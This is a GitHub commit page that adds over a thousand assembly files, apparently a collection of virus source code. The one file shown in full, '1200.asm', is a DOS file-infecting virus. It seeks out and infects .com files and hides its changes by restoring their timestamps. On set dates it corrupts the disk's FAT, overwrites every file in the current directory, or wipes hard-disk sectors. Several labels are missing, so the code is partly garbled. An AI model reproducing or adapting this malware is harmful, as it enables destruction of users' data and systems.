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Guilherme Thomazi Bonicontro committed Jan 2, 2019
1 parent e596a20 commit c0efda2
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Showing 1,042 changed files with 483,343 additions and 0 deletions.
412 changes: 412 additions & 0 deletions 0-9/100%-1.asm

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412 changes: 412 additions & 0 deletions 0-9/100%.asm

Large diffs are not rendered by default.

317 changes: 317 additions & 0 deletions 0-9/1200.asm
Original file line number Diff line number Diff line change
@@ -0,0 +1,317 @@
;hmm.,.,.,.,without a name.,.,.,.,
;this file is much like the 606, only it
;is much more has a special suprise
;for three diffrent dates....hehehehe.,.,,..,.,
;i had planned to have it in with the other TR-
;series, but this was much to large to add in with.,.,
; nUcLeii
; [*v i a*]===[98]

.model tiny

seg_a segment byte public

filename equ 30 ;find file name
fileattr equ 21 ;find file attributes
filedate equ 24 ;find file date
filetime equ 22 ;fine file time

org 100h

main proc
call dirloc

mov dx, 100h
mov bx, handle
mov cx, 1203
mov ah, 40h
int 21h

mov dx, offset dirdat ;offset to hold new dta
mov ah, 1ah ;set dta address
int 21h

mov ah,19h ;get drive code
int 21h
mov dl, al ;save drive code
inc dl ;add one to dl (functions differ)
mov ah, 47h ;get current directory
mov si, offset currentdir ;buffer to save directory in
int 21h
mov dx, offset daroot ;move dx to change to root
mov ah, 3bh ;change directory to root
int 21h

mov cx, 13h ;include hidden/ro dir.
mov dx, offset wild ;look for '*'
mov ah, 4eh ;find file
int 21h
cmp ax, 12h ;no file?
jne findmore ;no dir? screw it then.

jmp rollout

mov ah, 4fh ;find next target
int 21h
cmp ax, 12h
je wank ;no more? crew it then.

mov dx, offset dirdat+filename ;point dx to fcb-filename
mov ah, 3bh ;change directory
int 21h
mov ah, 2fh ;get current dta address
int 21h
mov [diskdat], es ;save old segment
mov [diskdatofs], bx ;save old offset
mov dx, offset filedat ;offset to hold new dta
mov ah, 1ah ;set dta address
int 21h

mov cx, 07h ;find any attribute
mov dx, offset filetype ;point dx to exe files
mov ah, 4eh ;find first file function
int 21h
cmp ax, 12h ;was it found?
jne change

mov ah, 4fh ;find next file
int 21h
cmp ax,12h ;none found
jne change ;see what we can do...
mov dx, offset daroot ;dx to change to root directory
mov ah, 3bh
int 21h
mov ah, 1ah ;set dta address
mov ds, [diskdat] ;restore old segment
mov dx, [diskdatofs] ;restore old offset
int 21h
jmp findmore
jmp rollout

mov ah, 2fh ;temp. store dta
int 21h
mov [tempseg], es ;save old segment
mov [tempofs], bx ;save old offset
mov dx, offset filedat+filename
mov bx, offset filedat ;save file...
mov ax, [bx]+filedate ;tha date
mov orig_date, ax
mov ax, [bx]+filetime ;tha time
mov orig_time, ax
mov ax, [bx]+fileattr ;tha attributes
mov ax, 4300h
int 21h
mov orig_attr, cx
mov ax, 4301h ;change attributes
xor cx, cx ;clear attributes
int 21h
mov ax, 3d00h ;open file and read
int 21h
jc fixup ;error?..go get another!
mov handle, ax ;save handle
mov ah, 3fh ;read from file
mov bx, handle ;move handle to bx
mov cx, 02h ;read 2 bytes
mov dx, offset idbuffer ;save to buffer
int 21h
mov ah, 3eh ;close it for now
mov bx, handle ;load bx with handle
int 21h
mov bx, idbuffer ;give bx the id string
cmp bx, 02ebh ;are we infected?
jne doit ;hmm...go get another.

mov ah, 1ah ;set dta address
mov ds, [tempseg] ;restore old segment
mov dx, [tempofs] ;restore old offset
int 21h
jmp nextfile

mov dx, offset filedat+filename
mov ax, 3d02h ;open victim read/write access
int 21h
mov handle, ax ;save handle
call infect ;do your job...
;mov ax, 3eh
;int 21h

mov ax, 5701h ;restore original...
mov bx, handle ;handle
mov cx, orig_time ;time
mov dx, orig_date ;date
int 21h
mov ax, 4301h ;and attributes
mov cx, orig_attr
mov dx, offset filedat+filename
int 21h
;mov bx, handle
;mov ax, 3eh ;close em"
;int 21h
mov ah, 3bh ;try this for speed...
mov dx, offset daroot
int 21h
mov ah, 3bh ;change directory
mov dx, offset currentdir ;back to the original
int 21h
mov ah, 2ah ;check system date
int 21h
cmp cx, 1998 ;hehe..if not then your already
jb getout ;screwed an ill leave ya alone.
cmp dl, 15 ;is it the 15th?...muhahaha
jne goaway ;not?...lucky you.
cmp dl, 19 ;is it the 19th?...muhahaha
je alter_fat ;your gonna have a few crosslinks...
cmp dl, 29 ;is it the 29th?...muhahaha
je ouch ;your screwed,..,.,.,.,
mov dx, offset dirdat ;offset to hold new dta
mov ah, 1ah ;set dta address
int 21h
mov ah, 4eh ;find first file
mov cx, 7h
mov dx, offset allfiles ;offset *.* ...hehehe...
jmp rockem

call outta

call outta

int 21h
jc goaway ;error? screw it then...
mov ax, 4301h ;find all "normal" files
xor cx, cx
int 21h
mov dx, offset dirdat+filename
mov ah, 3ch ;write to all files in current dir.
int 21h
jc outta ;error? screw it then...
mov ah, 4fh ;find next file
jmp rockem

xor dx, dx ;clear dx

mov cx, 1 ;track 0, sector 1
mov ax, 311h ;17 secs per track (hopefully!)
mov dl, 80h
mov bx, 5000h
mov es, bx
int 13h ;kill 17 sectors
jae rip_hd2
xor ah, ah
int 13h ;reset disks if needed
inc dh ;increment head number
cmp dh, 4 ;if head number is below 4 then
jb rip_hd1 ;go kill another 17 sectors
inc ch ;increase track number and
jmp ouch ;do it again

push dx
push bx
push cx
push ax
push bp ;save regs that will be changed
mov ax, 0dh
int 21h ;reset disk
mov ah, 19h
int 21h ;get default disk
xor dx, dx
call load_sec ;read in the boot record
mov bp, bx
mov bx, word ptr es:[bp+16h] ;find sectors per fat
push ax ;save drive number
call rnd_num ;get random number
cmp bx, ax ;if random number is lower than
jbe alter_fat1 ;secs per fat then jump and kill 'em
mov ax, bx ;else pick final sector of fat
int 26h ;write same data in that fat
pop bp
pop ax
pop cx
pop bx
pop dx
jmp outta

push cx
push dx ;save regs that will be changed
xor ax, ax
int 1ah ;get system time
xchg dx, ax ;put lower word into ax
pop dx
pop cx
ret ;restore values and return

push cx
push ds ;save regs that will be changed
push ax ;save drive number
push cs
pop ds
push cs
pop es ;make es and ds the same as cs
mov ax, 0dh
int 21h ;reset disk
pop ax ;restore drive number
mov cx, 1
mov bx, offset sec_buf
int 25h ;read sector into buffer
pop ds
pop cx
ret ;restore regs and return

mov ax, 4c00h ;end program
int 21h

words_ db "nUcLeii~ *v. i. a*",0
words2 db "1200..n0name",0
allfiles db "*.*",0
currentdir db 64 dup (?)
daroot db "\",0
dirdat db 43 dup (?)
diskdat dw ?
diskdatofs dw ?
filedat db 43 dup (?)
filetype db "*.com",0
handle dw ?
idbuffer dw ?
orig_attr dw ?
orig_date dw ?
orig_time dw ?
sec_buf dw 100h dup(?)
tempofs dw ?
tempseg dw ?
wild db "*",0

main endp
seg_a ends
end start

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